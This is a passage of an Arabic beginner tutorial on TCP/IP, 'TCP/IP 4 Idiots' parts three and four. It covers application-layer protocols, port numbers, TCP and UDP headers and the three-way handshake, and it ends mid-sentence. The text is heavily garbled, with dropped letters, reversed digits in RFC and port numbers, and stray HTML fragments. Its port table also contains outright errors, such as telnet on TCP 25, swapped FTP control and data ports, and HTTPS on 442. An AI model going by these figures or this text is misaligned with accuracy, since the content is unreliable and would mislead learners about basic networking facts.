تمريـر‪،‬‬ ‫‪ IP­Router‬‬ ‫‪I‬‬ ‫والجھاز الخاص لعملیة التمرير ھذه تسمي الموجه‬ ‫‪ UDP‬‬ ‫‪U‬‬ ‫كما تري من الصورة أعله أن توجیه رزم ل علقة لھا ھنا بنماذج ‪ TCP‬أو‬ ‫النموذجین‪ ...‬‬ ‫‪.‬‬ ‫لن بعض تصمیمات الموجھ ات ل تحتوي علي تلك‬ ‫=== ‪ IP‬تصمم شبكة منطقیة وحیدة ‪ ...‬‬ ‫ى‪ ‬‬ ‫نموذج ‪ IP‬تعتبر مفتاح نجاح تقنیة النترنت ‪ ..‬فكل نموذج أو المشغل تضیف إلى‬ ‫‪ Message‬ترويساتھ ا كما ذكرنا حتى تـصل إلـي النمـوذج أو الطبقـة الـسفلي ‪...‬‬ ‫وفي المقابل تقوم كل نموذج أو الطبقة في الطرف الخـر تقـوم بعـزل الترويـسة‬ ‫ة‬ ‫م‬ ‫خـام‬ ‫الخاصة بھا حتى تصل إلي الطبقة العلیا كما أرسلت في شكل ‪Message‬‬ ‫‪ ...‬‬ ‫ترويـسة ‪ IP‬تحمـل عنـوان ‪ IP‬التـي تكـون شـبكة منطقیـة وحیـدة مـن شـبكات‬ ‫ت‬ ‫ي‬ ‫يعنـي‬ ‫فیزيائیة متعددة ‪ .‬وتشبیك ھذه الشبكات الفیزيائیة ھي مصدر‪. Internet‬‬ ‫مجموعة مـن الـشبكات الفیزيائیـة متـصلة ومتـشابكة ببعـضھا وتـسمي إنترنـت‬ ‫ت‬


‫وتشكلھا‪ .‬‬ ‫‪ 06‬‬ ‫‪ TCP/IP 4 Idiots‬الجزء الثالث‪ ‬‬ ‫للكاتب‪ SaD.jAcKAl:‬‬ ‫الطبقةالولي لـ ‪ :TCP/IP‬طبقة التطبیقات ‪ Network application Layer‬‬ ‫(ملحظة ‪ -‬من اجل وثائق ‪ RFC‬استخدم الموقع‪ ‬‬ ‫‪ (/http://www.faqs.org/rfcs‬‬ ‫‪ : Archie - 1‬برنامج يمكن المستخدم من البحث في مزودات‪ ‬‬ ‫‪ FTP‬عن ملفات وقد حل محلھا تدريجیا ‪ ، WWW‬للمزيد‪ ‬‬ ‫‪ id=4&action=info&http://www.angels­bytes.com/?show=articals‬‬ ‫‪ BGP Border Gateway Protocol - 2‬بروتوكول غالبا يستخدم‪ ‬‬ ‫بین ‪ ISP‬من اجل الربط‪ ،‬وبما يعني ان النترنت نفسھا تتم الربط بین كبريات‬ ‫شبكاتھا‪ ‬‬ ‫بھذا البروتوكول‪ .‬‬ ‫وتندرج تحت ‪ Classless Routing Protocol‬عكس ‪ RIP‬التي تعتبر ‪Classfull‬‬ ‫للمزيد راجع ‪1771 ) RFC‬الصدار الخیر للبروتوكول )‪ ‬‬ ‫‪ : Domain Name Server DNS - 3‬بروتوكول تحويل النطاق‪ ،‬‬ ‫من اشھر برامجه ‪ Nsloopup‬تقوم بتحويل اسماء نطاق الي عناوين ايبي‪ ‬‬ ‫والعكس ‪ ..‬للمزيد‪ ‬‬ ‫‪ 16‬‬ ‫راجع الوثیقة ‪ RFC799,882,883,920,1035 etc‬‬ ‫‪ Finger - 4‬تستخدم من اجل الحصول علي معلومات حول‪ ‬‬ ‫مستخدم‪/‬مضیف ما في الشبكة‪ ،‬من المفضل دائما تعطیل ھذه الخدمة من‪ ‬‬ ‫اجل دواعي المنیة‪ ‬‬ ‫‪ . 8821 RFC‬‬ ‫‪ - 5‬تطبیق ‪ ،FTP‬اختصار ‪ File Transfer Protocol‬بروتوكول‪ ‬‬ ‫نقل الملفات‪ ،‬وتطبیق ‪ FTP‬مثل تلنت تعمل عبر ‪TCP‬و وفقا لبروتوكول ‪ ،FTP‬‬ ‫والعملیة تشبه‪ ‬‬ ‫عملیة الوجول للمزود عبر تلنت ولكنك ھنا تقوم بالتصفح عبر الفھارس والملفات‬ ‫وتمكنك‪ ‬‬ ‫من نقل الملفات بین الجھزة ‪ .‬راجع الوثیقة رقم ‪ 959RFC‬‬ ‫‪ HTTP Hypertext Transfer Protocol - 6‬بروتوكول نقل‪ ‬‬ ‫النص المتشعب ھو البروتوكول المعتمد لنقل النصوص بھیئة ‪ HTML‬في شبكة‪ ‬‬ ‫ويب‪ .‬يحتوي‪ ‬‬ ‫بروتوكول ‪ HTTP‬على أوامر عالیة المستوى‪ ،‬مثل ‪ Get‬و ‪ ،Put‬تستخدمھا‪ ‬‬ ‫المتصفات ‪ browsers‬‬ ‫في التواصل مع مزودات ويب‪ .‬ويستخدم المر ‪ Get‬لطلب صفحة ذات ھیئة‪ ‬‬ ‫‪ ، HTML‬أو صورة‪ ‬‬ ‫بھیئة ‪ ،GIF.‬أو أية بیانات أخرى من مزود ويب‪ ،‬لعرضھا على الشاشة‪ .‬راجع‪ ‬‬ ‫الوثیقة رقم‪ ‬‬ ‫‪ 5491RFC‬‬ ‫‪ 7 ­ IMAP The internet Mail/Messeg Access Protocol‬‬ ‫تستخدم ھ ذه البروتوكول من قبل برامج البريد اللكتروني كبديل ل ‪ POP‬‬ ‫وكواجھة بین‪ ‬‬ ‫المستخدم ومزود البريد وتعمل علي جلب وادارة صندوق البريد بشكل مرن ‪....‬‬ ‫راجع‪ ‬‬ ‫‪ 26‬‬ ‫الوثیقة ‪ 1371,0371RFC‬‬ ‫‪ Ping The Packet Internet Groper - 8‬أحد تطبیقات‪ ‬‬ ‫ا‪ ‬‬


‫‪ ،TCP/IP‬يستخدم لكشف ما إذا كان كمبیوتر معین متص ً بالشبكة وجاھًز‪ ‬‬ ‫ل‪ ‬‬ ‫للتصال به‪ .‬‬ ‫ويتم كشف حالة كمبیوتر ما‪ ،‬بإرسال إشارة إرجاع الصدى ‪ICMP echo request‬‬ ‫وانتظار‪ ‬‬ ‫الرد‪ .‬راجع ‪ 297RFC‬‬ ‫‪POP - 9‬بروتوكول مكتب البريد ‪ Post Office Protocol‬‬ ‫بروتوكول لنقل النصوص‪ ،‬يستخدم لرسال واستخراج رسائل البريد اللكتروني‪ ‬‬ ‫ضمن شبكة‪ ‬‬ ‫ف لبروتوكول ‪ ،SMTP‬الذي يستخدم لنقل رسائل البريد بین النظم‪ ‬‬ ‫إنترنت‪ .‬وخل ً‬ ‫ا‪ ‬‬ ‫المزودة‪ ،‬‬ ‫يوفر بروتوكول ‪ POP‬وسیلة لتفاعل برامج البريد مع صناديق البريد الفتراضیة‪ ،‬‬ ‫التي‪ ‬‬ ‫تحتفظ بالرسائل إلى حین استخراجھا أو إرسالھا إلى وجھاتھا‪ .‬يتوفر بروتوكول‪ ‬‬ ‫‪ POP‬تحت‪ ‬‬ ‫اسمین ‪2 POP‬و ‪3 .POP‬والتشابھة بین ھذين البروتوكول ھو في السم فقط‪ ،‬‬ ‫وھما غیر‪ ‬‬ ‫متوافقین على الطلق ‪ ..‬راجع الوثیقة رقم ‪ 0641RFC‬‬ ‫‪ - 01‬تطبیق ‪ Telnet‬اختصار ‪ :Telecommunication Network‬‬ ‫تقدم تلنت خدمة الولوج عن بعد عبر ‪ TCP‬والبروتوكول المسمي ‪ telnet‬‬ ‫‪ protocol‬وتعتبر‪ ‬‬ ‫من اقدم التطبیقات الشبكة‪ ،‬وعندما يقوم احد بالولوج عبر تلنت الي مزود‪/‬خادم‬ ‫بعید‪ ‬‬ ‫كلما يكتبه من اوامر تنفذ في ذاك المزود ولیس في جھازه ‪...‬وتطبیقات تلنت‪ ‬‬ ‫متوفرة في‪ ‬‬ ‫كل نظم التشغیل ول اعتبار لنظام التشغیل التي يعمل علیھا المزود‪ ...‬راجع‪ ‬‬ ‫الوثیقة‪ ‬‬ ‫‪ 36‬‬ ‫راجع الوثیقة ‪ 458RFC‬‬ ‫‪ SSH Secure Shell Protocol - 11‬يستخدم من قبل برامج‪ ‬‬ ‫للتصال بمضیف بعید عبر انترنت مثل تلنت ولكن يستخدم التشفیر في عملیة‬ ‫تبادل كلمة‪ ‬‬ ‫السر والبیانات ‪ .‬‬ ‫من اشھر برامجھا ‪ ..SecureCRT, Putty‬للمزيد راجع‪ ‬‬ ‫‪ http://www.cise.ufl.edu/help/ssh/RFC‬‬ ‫‪ SMTP - 21‬البروتوكول البسیط لنقل البريد ‪ Simple Mail‬‬ ‫‪ Transfer Protocol‬بروتوكول من مجموعة ‪ ،TCP/IP‬يستخدم لنقل النصوص‪ ‬‬ ‫أثناء تبادل‪ ‬‬ ‫الرسائل عبر إنترنت‪ .‬وھ و نسخة مبسطة عن بروتوكول ‪ .MTP‬يحدد بروتوكول‪ ‬‬ ‫‪ SMTP‬ھیئة‪ ‬‬ ‫وطريقة تبادل البیانات بین مزودات البريد‪.‬راجع الوثیقة رقم ‪ 228,128RFC‬‬ ‫‪ SNMP Simple Network Management Protocol - 31‬برتوكول‪ ‬‬ ‫ادارة الشبكة تعمل عبر ‪ UDP‬وصممت من اجل ادارة وفحص احوال الشبكات‪ ‬‬ ‫وبھا يستطیع مدير‪ ‬‬ ‫الشبكة اكتشاف مشاكل الشبكة قدم الصدار الول والثاني ‪..‬راجع الوثیق‪ ‬‬ ‫‪ 1441,7511RFC‬‬ ‫الصدار الثاني اضافت طرقا اكثر امانا لدارة الشبكات ‪ ...‬بروتوكول معقد نوعا ما‬ ‫‪ ،‬‬ ‫ونشرت كتب خصیصا لھا ‪ ...‬راجع الوثیقة ‪7511 RFC‬و ‪0752 RFC‬تتحدث عن‪ ‬‬


‫الصدار الثالث‪ ‬‬ ‫‪ ...‬‬ ‫‪ 46‬‬ ‫‪ http://www.wtcs.org/snmp4tpc/snmp_rfc.htm‬‬ ‫‪ SSL Secure Sockets Layer - 41‬طبقة مقبس آمن صممت من قبل نتسكیب‬ ‫تقدم آلیة عمل من‪ ‬‬ ‫اجل اتصال آمن عبر النترنت‪ ،‬اعتمدت علي التوثیق و طريقة تشفیر مفتاح‪ ‬‬ ‫العام ‪ Public‬‬ ‫‪ Key‬من اشھ ر برامج تستخدم ھذا البروتوكول ھو ‪ HTTP‬عبر ‪ ) SSL‬اغلب‪ ‬‬ ‫المتصفحات يدعم‪ ‬‬ ‫ھذا البروتوكول ھذه اليام )ولكنه لیس خاصا ب‪ HTTP‬فقط‪ ،‬بروتوكولت اخري‪ ‬‬ ‫مثل‪ ‬‬ ‫‪3 IMAP4,FTP,Telnet,POP‬ايضا تدعمه ‪ .‬الصدار الجديد من ھذا البروتوكول تم‬ ‫تسمیته‪ ‬‬ ‫‪ Transport Layer Security TLS‬راجع الوثیقة رقم ‪ 6422. RFC‬‬ ‫‪ ،TFTP The Trivial File Transfer Protocol - 51‬برتوكول‪ ‬‬ ‫مبسط من ‪ FTP‬من اجل نقل الملفات‪ ،‬وأقل أمنا ‪ ...‬راجع الوثیقة ‪ 0531. RFC‬‬ ‫‪ TraceRoute - 61‬من أشھ ر تطبیقات وبرامج مھمة في عالم‪ ‬‬ ‫الشبكة‪ ،‬صممت أصل من اجل اكتشاف حالة مزودما او طريقة ما بین جھازين‬ ‫‪ ...‬يظھر‪ ‬‬ ‫الطريق التي سلكه رزمة ما ارسلت من جھاز الي جھاز آخر‪ .‬متوفر في أغلب‪ ‬‬ ‫نظم التشغیل‪ ‬‬ ‫‪ ...‬تقنیا تعتمد علي حقل ‪ 3931Time­To­Live TTL .RFC‬‬ ‫‪ Whois - 71‬برنامج مفید مثل تبحث في قواعد بیانات ‪ DNS‬‬ ‫وغیرھ ا من اجل معلومات عن عناوين النطاق ( اسماء‪ ،‬عناوين وارقام تلیفونات‬ ‫للتصال‪ ‬‬ ‫وما الي ذلك )‪ .‬‬ ‫‪ www.arin.com‬‬ ‫‪ 56‬‬ ‫‪ ، www.ripe.net/whois‬للمزيد راجع الوثیقة‪ ‬‬ ‫رقم ‪ RFC 459‬‬ ‫‪ NFS - 81‬اختصار ‪ Network File System‬نظام ملف الشبكة‪ ‬‬ ‫طورت من قبل شركة ‪ Sun‬وتعمل عبر ‪ ، UDP‬تمكنك من الوصول الي القراص‬ ‫في شبكات بعیدة‪ ‬‬ ‫وكانھا جزء من الجھازالمحلي الخ آخر اصداره ‪ ،4‬راجع الوثیقة ‪ 0103RFC‬‬ ‫ھذا لیس حصرا لبرامج ھذه الطبقة وانما جزء منھا‪ ‬‬ ‫‪ 66‬‬ ‫‪TCP/IP4 Idiots‬الجزء الرابع‪ ‬‬ ‫للكاتب‪ SaD.jAcKAl:‬‬ ‫المنفذ ‪ :‬‬ ‫عندما وتنشئ اتصال او ربطا مع جھ از آخر‪/‬بعیدعلیك ان تحدد رقم المنفذ التى‪ ‬‬ ‫ترسل وتستقبل البیانات من خللھا ‪ .‬وھذه المنفذ لیست محسوسة كمنافذ‪ ‬‬ ‫‪2 COM1 , COM‬ولكنھ ا مجرد منفذ افتراضي وفائدة المنفذ حتى ل تضل البیانات‬ ‫طريقھا‪ ،‬مثل بدون المنفذ ماذا لو ذھب البیانات التى ترسلھا الى مزود ويب‪ ‬‬ ‫الى مزود آخر مثل ‪ Telnet‬او‪ FTP‬؟‪ ‬‬ ‫حتى ل يحدث ھ ذا تستخدم المنافذ حیث كل خدمة او بروتوكول لھا منفذ خاص‬ ‫مثل ‪ Telnet‬تستخدم منفذ ‪ 12‬لستقبال البیانات و ‪ HTTP‬تستخدم منفذ رقم‪ ‬‬ ‫‪ 08‬لتعامل مع العمیل الخ الخ ‪ ...‬‬ ‫المنافذ عبارة عن ارقام من ‪ 61‬بت حوالي اي ‪ 53556‬منفذ متوفرة ‪ ...‬‬ ‫المنافذ من ‪ 0‬حتي ‪ 3201‬تدعي المنافذ المعرفة مسبقا‪ ،‬مرتبطة‪ ‬‬


‫لتطبیقات‪/‬مزودات تقدم ببروتوكولت‪/‬خدمات معروفة مثل ‪ HTPP,FTP‬وفي نظم‪ ‬‬ ‫تشغیل متعدد البیئة مقیدة استخدامھ ا برخصة من مدير النظام ( ‪ root,‬‬ ‫‪ . (Administrator‬‬ ‫الرقام من ‪ 4301‬حتي ‪ 53556‬تدعي المنافذ المسجلة‪ ،‬وتقع في في ھذا‪ ‬‬ ‫القسم ارقام تعارف علیھ ا مجتمع النترنت لستخدامھا بحرية في تطبیقاتھم ‪ ،‬‬ ‫كل من تطبیقات مزود او الزبون بامكانھا اختیار رقم من ھذا القسم ( بالنسبة‪ ‬‬ ‫للمزود يستخدم منفذه الخاص المحددة‪ ،‬اما تطبیق زبون من الممكن اختیار أي‬ ‫رقم عشوائي من ھ ذا القسم أو تحصل علیه من قبل نظام التشغیل ) ‪ .‬‬ ‫‪ 76‬‬ ‫بعض ارقام المنافذ الشھیرة‪ ‬‬ ‫المنفذ البروتوكول الساسي‬ ‫الخدمة‪/‬البروتوكول‬ ‫‪ echo TCP 7‬‬ ‫‪ daytime TCP 13‬‬ ‫‪ ftp­control TCP 20‬‬ ‫‪ ftp­data TCP 21‬‬ ‫‪ telnet TCP 25‬‬ ‫‪ time UDP 27‬‬ ‫‪ Whois TCP 43‬‬ ‫‪ dns TCP/UDP 53‬‬ ‫‪ tftp UDP 69‬‬ ‫‪ ghoper TCP 70‬‬ ‫‪ finger TCP 79‬‬ ‫‪ HTTP TCP 80‬‬ ‫‪ pop3 TCP 110‬‬ ‫‪ netbios­ns UDP 137‬‬ ‫‪ netbios­dgm TCP 138‬‬ ‫‪ netbios­ssn TCP 139‬‬ ‫‪ imap TCP 143‬‬ ‫‪ bgp TCP 179‬‬ ‫‪ http/ssl TCP 442‬‬ ‫‪ rip UDP 520‬‬ ‫‪ socks TCP 1080‬‬ ‫‪ traceroute UDP 33434‬‬ ‫والقائمة الكاملة للمنافذة توجد ھنا‪ ‬‬ ‫‪http://www.iana.org/assignments/port­numbers‬‬ ‫‪ 68‬‬ ‫وارقام المنافذ والخدمات المدعمة من قبل النظام توجد في ملف اسمه‪ ‬‬ ‫‪ services‬في بیئة لینكس في مجلد ‪ ، /etc‬وفي بیئة ويندوز ‪ ، c:\windows‬‬ ‫وفي بیئات ‪ W2k‬توجد في ‪ C:\winnt\system32\drivers\etc‬‬ ‫•‪ ‬بروتوكول التحكم بالنقل ‪ TCP Transmission Control Protocol‬‬ ‫كما ھو مذكور في ‪ RFC793 TCP‬تقدم قناة اتصال تعتمد علي إنشاء اتصال اول‬ ‫وبذلك تضمن وصول الرزم الي وجھتھا وفي ترتیبھا الصحیح في حالة تجزئتھا‪ ‬‬ ‫وتقوم كشف الخطاء وتصیحھا وتجمیعھ ا مرة اخري اذا كانت قد قسمت الي‪ ‬‬ ‫رزمة صغیرة ‪ ..‬‬ ‫يستخدم ‪ TCP‬من قبل تطبیقات الشبكات التي تتطلب اتصال آمن‪/‬موثوق‪ ‬‬ ‫وويضمن عدم ضیاع الرزم‪ ،‬وابرز المثلة لذلك تطبیقات ‪FTP‬و ‪ TELNET‬‬ ‫وغیرھم‪..‬إل ان ‪ TCP‬مقابل تلك الموثوقیة يتطلب مزيدا من قوية ‪CPU‬و عرض‪ ‬‬ ‫الحزمة للشبكة ونموذج ‪ TCP‬وترويستھا أكثر تعقیدا من ‪ . UDP‬‬ ‫عندما يبدأ تطبیق ما استخدام‪ ،TCP‬نموذج ‪ TCP‬في المكدس في جھاز الزبون‬ ‫والخادم يبدءان في التخاطب ويتم انشاء وصلةافتراضیة ‪Virtual Circui‬بینھم‪ ‬‬


‫تحمل معلومات عن كل منھم وھ ذه الوصلت الفتراضیة تعتبر الرسال فیھا ذو‪ ‬‬ ‫اتجاه ثنائي‪ full deplex‬بمعني ان الرسال يتم في كل التجاھین وفي نفس‪ ‬‬ ‫الوقت مثل التلیفون ‪ ...‬‬ ‫‪ 0 1 2‬‬ ‫‪ 3‬‬ ‫‪6 54 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0‬‬ ‫‪ 10 98 7‬‬ ‫‪ 96‬‬ ‫‪ Source Port | Destination Port‬‬ ‫‪ Sequence Number‬‬ ‫‪ Acknowledgment Number‬‬ ‫‪ Data | | |U|A|P|R|S|F‬‬ ‫‪ Offset | Reserved | |R|C|S|S|Y| I‬‬ ‫‪ Window‬‬ ‫‪ | ||G|K|H|T|N|N‬‬ ‫‪ Checksum | Urgent‬‬ ‫‪ Pointer‬‬ ‫‪ Options | Padding‬‬ ‫‪.................... Data‬‬ ‫وفي ھذه الطبقة وحدة البیانات تسمي ‪ segment‬لن ‪ TCP‬ھنا ل تعرف‪ ‬‬ ‫‪ ) Message‬تذكر الرزمة في طبقة التطبیقات تدعي ‪ ( Message‬بل تقوم بارسل‬ ‫البیانات علي شكل مجموعة بايتات وتكوين ھذا القطعة‪ ،‬وعلي ‪ TCP‬أن يعرف‪ ‬‬ ‫إلي اي عملیة اتصال تنتمي ھذه القطعة‪ ،‬ويسبقھ ا عملیة اضافة ترويسة‪ ‬‬ ‫خاصة ب ‪ ،TC‬وھ ذه الترويسة مجموعة من حقول المعلومات ( بايتات ) تضاف‪ ‬‬ ‫إلي بداية كل قطع ‪ ....‬وھي تظھر في الرسم أعله ‪ ..‬وتسمي ترويسة رزمة‪ ‬‬ ‫‪ .. TCP‬وھي تتكون من ‪ 02‬بايت تشكل حقول المعلومات‪ ،‬واھم ھذه الحقول‪ ‬‬ ‫الحقول التي تحمل عنوان الجھة الخري‪ ،‬ورقم النفذ‪ ،‬وعنوان المرسل والمنفذ‪ ‬‬ ‫ورقم التسلسل للرزمة ‪ ...‬‬ ‫‪ TCP‬بعد تقسیم البیانات يمررھا إلي طبقة اليبي مع وجھتھا‪ ..‬واليبي لیست‪ ‬‬ ‫لديھا فكرة عما اذا كانت ھذه القطعة متصلة بما قبلھ ا من القطع او بما بعدھا‪ ‬‬ ‫‪ ...‬‬ ‫ونستعرض حقول ھذه الترويسة فیما يلي ‪ :‬‬ ‫= حقل ‪ Source Port, Destination Port‬تحتوي علي المنفذين في‪ ‬‬ ‫المستخدمة في جھة تطبیقات المزود والزبون ‪ ...‬‬ ‫‪ 07‬‬ ‫= حقل ‪ Sequence Number‬الرقم التسلسلي تشیر الي ترتیب اول بايت في‬ ‫المقطع الحالي‪ ،‬تشیر الي ترتیبھا في مجموع تیار البیانات ‪ ... Stream‬والرقم‪ ‬‬ ‫التسلسي ل يكون حسبب عدد الرزم ولكن حسبب البیانات‪ ،‬مثل‪ ،‬اذا كان‪ ‬‬ ‫الرزمة الولي حجمھا ‪ 005‬بیات‪ ،‬ستكون الرقم التسلسي ‪ ، 0‬والرقم‪ ‬‬ ‫التسلسلي للرزمة الثانیة ‪ 005‬ھكذا دوالیك ‪ ..‬وھي تفید في اعادة تجمیع‪ ‬‬ ‫الرزم وتشكیلھا من جديد الي الصل ‪ ..‬‬ ‫= حقل المصادقة ‪ Acknowledgment number‬تستخدم من قبل المرسل‪ ‬‬ ‫للتأكد من استلم البیانات ‪ ،‬فمن اجل التأكد ان ال القطعة وصلت الي ھدفھا‪ ‬‬ ‫يجب علي المستقبل ارسال رسالة ‪ ،acknowledgement‬وھي تحمل في‪ ‬‬ ‫نفس الوقت رقم تسلسلي التي يتوقعھا المستقبل في تیار البیانات ( في‪ ‬‬ ‫حالة تسلم ‪ 005‬بايت المستخدم يرسل رقم ‪ ) 005‬اما في حالة المرسل لم‪ ‬‬ ‫يستلم رسالة تاكید ‪ Acknowledgement‬من المستقبل في وقت محدد يقوم‪ ‬‬ ‫بارسال المعلومات مرة اخري ) ‪ > <.‬‬ ‫= حقل ‪ data offset‬تشیر اول بايت تنتمي الي المعلومات ‪ ...‬‬ ‫= حقل ‪ Control flag‬تحمل مجموعة من الرايات التي تتحكم في عملیة اتصال‬


‫‪ TCP‬وھي تشمل ‪ :‬‬ ‫== ‪ ، urgent pointer field Significant URG‬عندما يتم تحديد ھذه الراية‪ ‬‬ ‫تشیر الي ان المقطع الحالي يحمل بیانات مھمة تتطلب الولوية في المعالجة‪ ‬‬ ‫‪ ..‬‬ ‫== ‪ ، Acknowledgement Field Significant ACK‬عندما يتم تحديد ھذه‪ ‬‬ ‫الراية تشیر إلي ان القیمة التي في حقل ‪ Acknowledgment Number‬رقم‪ ‬‬ ‫صحیح‪ ،‬يتم تحديد ھذه الراية في كل المقاطع ( الرزم) باستثناء اول رزمة في‪ ‬‬ ‫عملیة انشاء التصال ‪ .‬‬ ‫== ‪ Push function PSH‬تستخدم لجبار ‪ TCP‬في ارسال البیانات بل انتظار‪ ‬‬ ‫لنتھاء المستقبل من معالجتھا ( تحرير الذاكرة الوسیطة ‪ buffer‬من البیانات‪ ‬‬ ‫السابقة ولستقبال الجديد ) ‪ ..‬مفیدة عند ارسال كمیة بیانات قلیلة‪ ..‬‬ ‫== ‪ Reset Connection RST‬عندما يتم تحديد ھذه الراية تتم إنھاء التصال‪ ‬‬ ‫فورا ‪ ..‬‬ ‫‪ 17‬‬ ‫== ‪ Synchronize Sequence Number SYN‬تحدد رقم تسلسل تھیئة في‪ ‬‬ ‫بداية انشاء التصال ‪ ...‬‬ ‫== ‪ Finish FIN‬تشیر الي طلب انھ اء التصال بشكل طبیعي ( نتیجة لنتھاء‪ ‬‬ ‫المھمة من التصال ) ‪ ..‬‬ ‫= حقل ‪ Window‬تستخدم من اجل التحكم في سیر البیانات‪ ،‬تحمل رقما‪ ‬‬ ‫تشیر الي كمیة البیانات التي يستطیع المسستقبل استقالبھا في ذاكرة‪ ‬‬ ‫الوسیطة ‪ buffer‬المخصصة للتصال الحالي وعندما يصل يستقبل معلومات تتم‬ ‫نقص ھذا الرقم بحجمھ ا ‪ ..‬المرسل ل يستطیع ارسال البیانات بشكل متواصل‬ ‫او بشكل اسرع مما يستطیع الطرف الخر معالجته ‪ ،‬ومن اجل حل ھذه‪ ‬‬ ‫المشكلة يقوم الطرف الخر بملء خانة ‪ Window‬بكمیة البیانات التي يستطیع‪ ‬‬ ‫معالجتھ ا في وقت واحد ‪ ...‬كلما يستلم الطرف الخر كمیة من البیانات يقوم‪ ‬‬ ‫بانقاص الرقم في حقل ‪ window‬بشكل مناسب‪ ،‬حتي اذا ما صارت صفرا يجب‬ ‫علي المرسل التوقف لبرھ ة حتي يقوم المستقبل بمعاجلة البیانات ويفرغ ال‪ ‬‬ ‫‪ Buffer‬ثم يقوم بزيادة الرقم في حقل ‪ window‬بما يعني ان المستقبل جاھز‪ ‬‬ ‫لستقبال البیانات مرة اخري ‪ ...‬‬ ‫= حقل ‪ checksum‬التحقق وھذا رقم يتم حسابھ ا وفق خوارزمیة معینة وتنتج‪ ‬‬ ‫رقما فريدا يمكن بھ ا التقق من صحة المعلومات الواردة او حدوث تلف‪/‬تغییر في‬ ‫محتواھ ا ‪ ...‬الطرف التي استلمت الرزمة تقوم باعادة انتاج‪ Checksum‬للبیانات‪ ‬‬ ‫وتقارنھا مع ‪ Checksum‬الواردة في الترويسة‪ ،‬واذا كانت نفس الرقام تكون‪ ‬‬ ‫الرزمة سالمة وال تعبر تالفة وتترك‪ ،،‬ويتم طلب اعادة ارسال الرزمة مرة اخري‪ ‬‬ ‫‪ ...> /< FONT‬‬ ‫= حقل ‪ Urgent Pointer‬تشیر الي بداية بیانات التي اشیر الیھا كبیانات يجب‪ ‬‬ ‫اعطائھا الولوية في المعالجة ‪ ،‬وھذه البیانات توضع داخل القطعة ما بین‪ ‬‬ ‫الترويسة والبیانات العادية وھ ذا الحقل صحیح في حالة استخدام راية ‪... URG‬‬ ‫فلنقل انك بدات في ارسال ملف ما إلي جھة ما‪ ،،‬‬ ‫‪.........................‬الملف‪ ................................‬‬ ‫ثم تم تقطیعھا الي القطع من قبل ‪ ،TCP‬‬ ‫‪ .... .... .... .... .... .... .... .... .... .... .... .... ....‬‬ ‫‪ 27‬‬ ‫اذا افترضنا ان ‪ T‬تمثل ترويسة ‪ TCP‬والبیانات ‪ .....‬فسوف يكون الشكل الكامل‪ ‬‬ ‫للملف ھكذا‪ ‬‬ ‫‪ ....T ....T ....T ....T ....T ....T ....T‬‬ ‫( لماذا التقطیع الي رزم صغییرة؟؟ لن النترنت تتكون من شبكات مختلفات‪ ‬‬ ‫التصمیم فبعض الشبكات قدرتھ ا علي المعالجة اقل من الشبكات الخري في‪ ‬‬ ‫الحجم للرزم )‪ ‬‬ ‫علي صعید التحقق من البیانات ‪ TCP ،error control‬يقوم بنوعین من الخدمة ‪:‬‬


‫‪ - 1‬ارسال الرزم المفقودة في الطريق ‪ ،‬واذا الرزمة فقدت ولم يستلم المرسل‪ ‬‬ ‫جواب ‪ ACK‬من المستقبل خلل مدة معینة ‪ Time out‬يقوم بارسال الرزمة مرة‪ ‬‬ ‫اخري ‪ ..‬‬ ‫‪ - 2‬ارسال الرزم التي وصلت تالفة ( تستخدم حقل ‪ (chsecksum‬و ‪ ..CRC‬‬ ‫المرسل عندما يرسل رزمة ما تنتظر وصول جواب‪ ACK‬من المستقبل لمدة‪ ‬‬ ‫معینة‪ ،‬وفي حالة اكتشاف المستقبل خطأ ما في الرزمة يقوم بارسال رزمة‪ ‬‬ ‫‪ NOT ACK‬او ل يرسل حتي يحدث ‪ Time out‬فالمرسل يعید ارسال الرزمة الخ‪ ‬‬ ‫‪ ..‬‬ ‫•‪ ‬بروتوكول ‪ User Datagram Protocol‬‬ ‫‪ UPD‬ذكرت بالتفصیل في ‪867 RFC‬تقدم اتصال عديم التصال( أي ارسال‪ ‬‬ ‫البیانات ل تتطلب عملیة انشاء التصال مثل ‪ ،( TCP‬تستخدم من قبل تطبیقات‪ ‬‬ ‫تكتفي بارسال رزمة او رزمتین في خدماتھ ا او تستخدم من قبل خدمات التي ل‬ ‫تتأثر بضیاع قلیل من البیانات وتقوم بارسال كمیة كبیرة جدا من البیانات ( مثل‪ ‬‬ ‫تطبیقات فیديو ‪ ،‬صوت ) و‪ UDP‬فقط تقوم باضافة رقم المنفذ وعنوان ‪ IP‬الي‪ ‬‬ ‫المقطع ‪ .‬من التطبیقات التي تستخدم ھذا البروتوكول ‪ NFS‬و ‪ SNMP‬الخ بما ان‬ ‫‪ UDP‬عديمة التصال فھ ي تعد غیر موثوق ول تضمن وصول البیانات الي وجھتھا‬ ‫ول تقدم طريقة للتحقق من ترتیب اجزاء البیانات ‪ ..‬‬ ‫من أسباب إنشاء وتطوير ھ ذا البروتوكول أن إرسال البیانات عبره ل يتطلب ال‪ ‬‬ ‫القلیل جدا من الوقت‪ ،‬اذ أن رزم ‪ UDP‬ل تحتوي علي إشارات تزامن او خیارات‪ ‬‬ ‫الفضلیة كما ل يراقب ھ ذا البروتوكول تسلسل أرقام الرزم ‪ ...‬لذلك يعتبر سريع‪ ‬‬ ‫‪ 37‬‬ ‫الداء ذو فعالیة كبیرة خاصة من الجل التصالت المخصصة للبث او الرسائل‪ ‬‬ ‫العامة للشبكة ( البث الشامل) ‪ ...‬‬ ‫‪ Source Port | Destination‬‬ ‫‪ Port‬‬ ‫‪ Length | Checksum‬‬ ‫‪ .................... Data‬‬ ‫حقل ‪ Length‬تشیر الي حجم مطقع ‪ .. UDP‬‬ ‫== والن نتعرف علبي المصافحة الثلثیة في إنشاء التصال ‪ :‬‬ ‫الزبون ‪ ----- :1‬رزمة تحمل رقم تسلسي وراية ‪ <­­­­­­­­­­ SYN‬المزود‪ ‬‬ ‫الزبون <‪ ACK/SYN ------‬حسن الیك رقمي التسلسي لرزمتي ‪ 2:---‬المزود‬ ‫الزبون ‪ -----:3‬لقد تلقیت رقمك يا مزود والیك رزمتي ‪ <­­­­­ACK‬المزود‪ ‬‬ ‫في بداية انشاء التصال الزبون يختار منفذ عشوائي متوفر‪ ،‬رقم تسلسي‪ ‬‬ ‫‪ 47‬‬ ‫بدائي ‪ SIN‬للرزمة التي ترسل طلبا لنشاء التصال‪ ،‬وترسل ذلك الرقم برزمة‪ ‬‬ ‫تححد فیھا راية ‪ SYN‬ولذك تعرف ھذه الرزمة برزمة ‪ . SYN packet‬‬ ‫من جھة اخري المزود 